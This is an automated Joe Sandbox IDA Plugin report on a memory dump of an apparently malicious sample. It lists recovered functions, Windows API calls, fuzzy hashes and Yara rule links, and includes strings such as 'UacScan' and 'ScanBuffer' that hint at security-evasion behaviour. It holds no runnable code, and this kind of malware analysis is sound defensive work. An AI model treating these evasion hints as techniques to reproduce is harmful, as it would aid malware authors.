Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: df0ebbd49c3a427229fcfe081cf9a0000e2a8653e023cf59d4f9583f6407e03e
Instruction ID: f1356f7f2b1cfedd5e9de5f4de33313e7f295cac0f0f0dbdd4a6d62c141d5137
Opcode Fuzzy Hash: df0ebbd49c3a427229fcfe081cf9a0000e2a8653e023cf59d4f9583f6407e03e
Instruction Fuzzy Hash: A6E0ECB81052056DFE146A6888C0F363369AF81741B65C4ADA500CA1E4DBBDB851A624

Uniqueness

Uniqueness Score: -1.00%

Function 0411F2A8 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 0411F5A6

Strings

H, xrefs: 0411F35D

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: d81f2b782fca3a18651f7123ccbf8ac9d44f29574c1425e71d110c415af5dea9
Instruction ID: 026be1bb1e4caf75e4f40cb8caa2ad56ca3f74f40ec70be7ca7cf6ba1b06225a
Opcode Fuzzy Hash: d81f2b782fca3a18651f7123ccbf8ac9d44f29574c1425e71d110c415af5dea9
Instruction Fuzzy Hash: 10B1B075A016089FDB14CFA9E4C0A9DBBF6FF89314F2585A9E805AB360D730AD46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 041204BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,04120524), ref: 041204F2

Strings

MS Shell Dlg 2, xrefs: 041204C3

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: QueryValue
String ID: MS Shell Dlg 2
API String ID: 3660427363-3198668166
Opcode ID: db5121f2734763979ec4ff47aa658ec7e1099c7c02836b1da46307653a404667
Instruction ID: 796a58e4511e56f452180bb5840b1d834568e22d4ac896086e01f2fb9f441c43
Opcode Fuzzy Hash: db5121f2734763979ec4ff47aa658ec7e1099c7c02836b1da46307653a404667
Instruction Fuzzy Hash: F5F0827230D2446FE704EAAC9D80BAB7B9C9BC5210F05817AF948C7181DB60DC098365

Uniqueness

Uniqueness Score: -1.00%

Function 041204C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,04120524), ref: 041204F2

Strings

MS Shell Dlg 2, xrefs: 041204C1, 041204C3

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: QueryValue
String ID: MS Shell Dlg 2
API String ID: 3660427363-3198668166
Opcode ID: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
Instruction ID: 4dedee6ade5d847396dbef7e67e3dbdc5c358bd9fb8afaa4b0739716c07e4bdf
Opcode Fuzzy Hash: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
Instruction Fuzzy Hash: 8FF037723051186BE704E96D9D80FAB7BDCDBC5254F018139B94CC7181DF61DC058361

Uniqueness

Uniqueness Score: -1.00%

Function 0410FACC Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 0410FAED

Part of subcall function 0410F6D0: VariantClear.OLEAUT32(?), ref: 0410F6DF

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 6ac81f67a86c8f06f72f36c66da4900b5eefcbe9e7733db7e69d2e0826b66101
Instruction ID: c895633486bb67223f34c715aa4fee66fc9174fca178acdc02ab4e1ff28d66ab
Opcode Fuzzy Hash: 6ac81f67a86c8f06f72f36c66da4900b5eefcbe9e7733db7e69d2e0826b66101
Instruction Fuzzy Hash: FE11C2307003108BEB34AF29C8D296773E9EF89250719C466E44A8F2D5DBF0FC42CA95

Uniqueness

Uniqueness Score: -1.00%

Function 04120274 Relevance: 3.0, APIs: 2, Instructions: 18registryCOMMON

Download Yara Rule

APIs

RegFlushKey.ADVAPI32(00000000,?,041202E0,?,?,00000000,0412048C,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 04120285
RegCloseKey.ADVAPI32(00000000,?,041202E0,?,?,00000000,0412048C,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 0412028E

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CloseFlush
String ID:
API String ID: 320916635-0
Opcode ID: 8b6c78a4fb516c382b240a28acd5c82c32bd55bdd7229201c6335f5bac760729
Instruction ID: c391f17251aa5cd00b92901382a1672446ba779c44035a61d2b11fbefae8a385
Opcode Fuzzy Hash: 8b6c78a4fb516c382b240a28acd5c82c32bd55bdd7229201c6335f5bac760729
Instruction Fuzzy Hash: 2DD017B06002108AEF90EF7889C0B067BDC6F0C214B48C5A6E90CCF186DBA4E4608B20

Uniqueness

Uniqueness Score: -1.00%

Function 0410F768 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0410F7A8

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 75949a2ef6f37a5f26c56f06fe1923bde2bbc8c67acb2c419f877f67a6a1f298
Instruction ID: d31d0d2248931beebfc817ee6e673849e27b01d3c9821f61e8d89eff8542a7d5
Opcode Fuzzy Hash: 75949a2ef6f37a5f26c56f06fe1923bde2bbc8c67acb2c419f877f67a6a1f298
Instruction Fuzzy Hash: DD3154756002099FEB34DF98C8C69EA77E8EB49304F4485A2F905D3290D7F4F942C752

Uniqueness

Uniqueness Score: -1.00%

Function 04120306 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,041204A2), ref: 04120374

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 9951a1932acdc37e8fe57757510f17e78cd6297d94db7ce60af290a67d9408c8
Instruction ID: 0dfb5288beb8a6507f6f70081ed9be1cdf92519a8c76551c72c14ff1d19b0e63
Opcode Fuzzy Hash: 9951a1932acdc37e8fe57757510f17e78cd6297d94db7ce60af290a67d9408c8
Instruction Fuzzy Hash: 43218730B00618AFE711EBA4DAD1B9EBBE9EB48304F118579A904E3291DB75AF159640

Uniqueness

Uniqueness Score: -1.00%

Function 0410738A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 041073CB

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
Instruction ID: 22677f18910c7fa4cb97580dc9c9eb06915b3f2a06f6f1ce795fdeb792c2a94c
Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
Instruction Fuzzy Hash: B0F09DB2700158BFAB80DE9DDC84EDB77ECEB4C2A4B058166FA0CD7200D670ED108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0410738C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 041073CB

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
Instruction ID: 6605b6554f4923369ef8fae41d7b48605b3a5c41a751c0a2fa55fec4613f6e6f
Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
Instruction Fuzzy Hash: A6F09DB2600158BF9B80DE9DDC84EDB77ECEB4C2A4B058166FA0CD7200D670ED108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0411EF38 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,0411EF85,?,?,?,00000000), ref: 0411EF65

Part of subcall function 04104F68: SysFreeString.OLEAUT32(0415C89C), ref: 04104F76

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 40f3ad3190eb09af0a1b9599efc142d8c0bda581fa18422984bce256da5478ba
Instruction ID: eaa3c9526e2306dda04d51b6185fdb3cc027c4146a35e5938933d789f2b2e676
Opcode Fuzzy Hash: 40f3ad3190eb09af0a1b9599efc142d8c0bda581fa18422984bce256da5478ba
Instruction Fuzzy Hash: 7CE0E5302043047FE300EBB1CCC1D5DB69CDB89604BA184B1EC0093590DBB0BE008960

Uniqueness

Uniqueness Score: -1.00%

Function 04105B78 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(04100000,?,00000105), ref: 04105B96

Part of subcall function 04105DDC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,04100000,0416A794), ref: 04105DF8
Part of subcall function 04105DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,04100000,0416A794), ref: 04105E16
Part of subcall function 04105DDC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,04100000,0416A794), ref: 04105E34
Part of subcall function 04105DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 04105E52
Part of subcall function 04105DDC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,04105EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 04105E9B
Part of subcall function 04105DDC: RegQueryValueExA.ADVAPI32(?,04106048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,04105EE1,?,80000001), ref: 04105EB9
Part of subcall function 04105DDC: RegCloseKey.ADVAPI32(?,04105EE8,00000000,?,?,00000000,04105EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04105EDB

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
Instruction ID: 89fc8bc082ae79e9514411f16dc21c6b0f15b8cbd25bb6d7f5eca01b3c5fdd92
Opcode Fuzzy Hash: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
Instruction Fuzzy Hash: 43E0ED71A01214EFDF10DE58C9C4A8637D9AB08754F048991AD58CF386D3F1EA508BE5

Uniqueness

Uniqueness Score: -1.00%

Function 04108D64 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 04108D78

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
Instruction ID: 695530a4d054b02311181f55d3ed41584b0b9196a0b1573dc6f3b330ad3b8d80
Opcode Fuzzy Hash: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
Instruction Fuzzy Hash: C9D05B723081107AE320A55A5DC4EAB5BDCCFC9770F104739B598C31C0D7609C018371

Uniqueness

Uniqueness Score: -1.00%

Function 04108DE0 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0415D4C6,ScanString,0419A350,04167AE0,OpenSession,0419A350,04167AE0,ScanString,0419A350,04167AE0,UacScan,0419A350,04167AE0,UacInitialize), ref: 04108DEB

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2785c1fc5c6a4e355bfa7689c33097217eaa1f53bd37c8fc86f03cf53ba053af
Instruction ID: 8e7df3ff580c76943f87ae30dd419fd2cb3d3e35dc9ebd39bd37c633dc2c88e1
Opcode Fuzzy Hash: 2785c1fc5c6a4e355bfa7689c33097217eaa1f53bd37c8fc86f03cf53ba053af
Instruction Fuzzy Hash: B0C08CF0316200073B1471FC0EC411A0A8889582393248FA1B438C31E3D7A2B0633124

Uniqueness

Uniqueness Score: -1.00%

Function 04108E04 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0416062B,ScanString,0419A350,04167AE0,OpenSession,0419A350,04167AE0,OpenSession,0419A350,04167AE0,ScanBuffer,0419A350,04167AE0,ScanString), ref: 04108E0F

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
Instruction ID: 84bfe0c73dda96b92c79767f2b61ec7dee0dbc9a677d3a47c3c1f9292c2aabff
Opcode Fuzzy Hash: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
Instruction Fuzzy Hash: D3C08CB03062000E3F50B5FC0EC045A06884A44139320AFA1F429C31E2D7A2B0632010

Uniqueness

Uniqueness Score: -1.00%

Function 04104F80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 04104F93

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 4c26b98c80642be3bb457a0a6325ed943588a8704c231b59171f708dcadf21d2
Instruction ID: 292fcd630b73b29f5ff7d7a1d85a5ba32a8df515cee7849ded3e19f33108f643
Opcode Fuzzy Hash: 4c26b98c80642be3bb457a0a6325ed943588a8704c231b59171f708dcadf21d2
Instruction Fuzzy Hash: D7C012B56512301BFB319A5C9CC0B5563CC9B06295F5440E5E504DB280E3A4BC004350

Uniqueness

Uniqueness Score: -1.00%

Function 04104FA4 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(0415C89C), ref: 04104F76
SysReAllocStringLen.OLEAUT32(04168B50,0415C89C,00000016), ref: 04104FBE

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
Instruction ID: 7e59e4c4f6ad1d7016ec21405bff35863ea1f1e0ae7997adb9bde54b2ccd3f5c
Opcode Fuzzy Hash: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
Instruction Fuzzy Hash: 9BD0807411420169AE2C753C45C583772699AD534179FC2ED6A02471C0E7F5FC00D730

Uniqueness

Uniqueness Score: -1.00%

Function 04168710 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,04168704,00000000,00000001), ref: 04168720

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: a40f4f89cd1a92cb711b9289cbdf2343423965561d54446d4d0d5684869c73c8
Instruction ID: 0ff679d4ab0c887eb0ac8d5c07cb239ca37bfdb9757a164f1b180e07affa90b0
Opcode Fuzzy Hash: a40f4f89cd1a92cb711b9289cbdf2343423965561d54446d4d0d5684869c73c8
Instruction Fuzzy Hash: 65C092F0382300BAF62066AA2DD2F27118CE344B28F104825B602FE2C1D2E6AC1092A1

Uniqueness

Uniqueness Score: -1.00%

Function 04104F40 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 04104F47

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
Instruction ID: 30987c61955555e63e7d814eb048019f88ba43796a0b868e730e9def72521752
Opcode Fuzzy Hash: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
Instruction Fuzzy Hash: 26B0123831C24120FA5030A50DC0B3202DC0F00385F85C0D1AF18C00C5EBC9F8156035

Uniqueness

Uniqueness Score: -1.00%

Function 04104F58 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 04104F5F

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: a73baa7010e2214fc82cb9e8665bcb2621c1da538b25aa4ddb9b3979219b4310
Instruction ID: 153c935711061f86b14c550257033ac29fcb8fbb4960745918cf42323f7e93a1
Opcode Fuzzy Hash: a73baa7010e2214fc82cb9e8665bcb2621c1da538b25aa4ddb9b3979219b4310
Instruction Fuzzy Hash: 2AA022BC00030328AF0B323C00C0A3A22323FC03083ECC0FC02000A0808FBFB000C020

Uniqueness

Uniqueness Score: -1.00%

Function 0411E97C Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0411E99A

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7412f7cdcefefb600e78eb11408d99bc31232b3c5936744e94ada9414ed35def
Instruction ID: 03158c749a7a0417f3cf4329df150236d796fe4a16f63e54a77103a0716976c8
Opcode Fuzzy Hash: 7412f7cdcefefb600e78eb11408d99bc31232b3c5936744e94ada9414ed35def
Instruction Fuzzy Hash: 121148342803198BE750DF59C9C0B52F7E5EF88390B10C63AE9999B395D774FA188BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04101668 Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,04101A9F,?,0410209C), ref: 0410167E

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

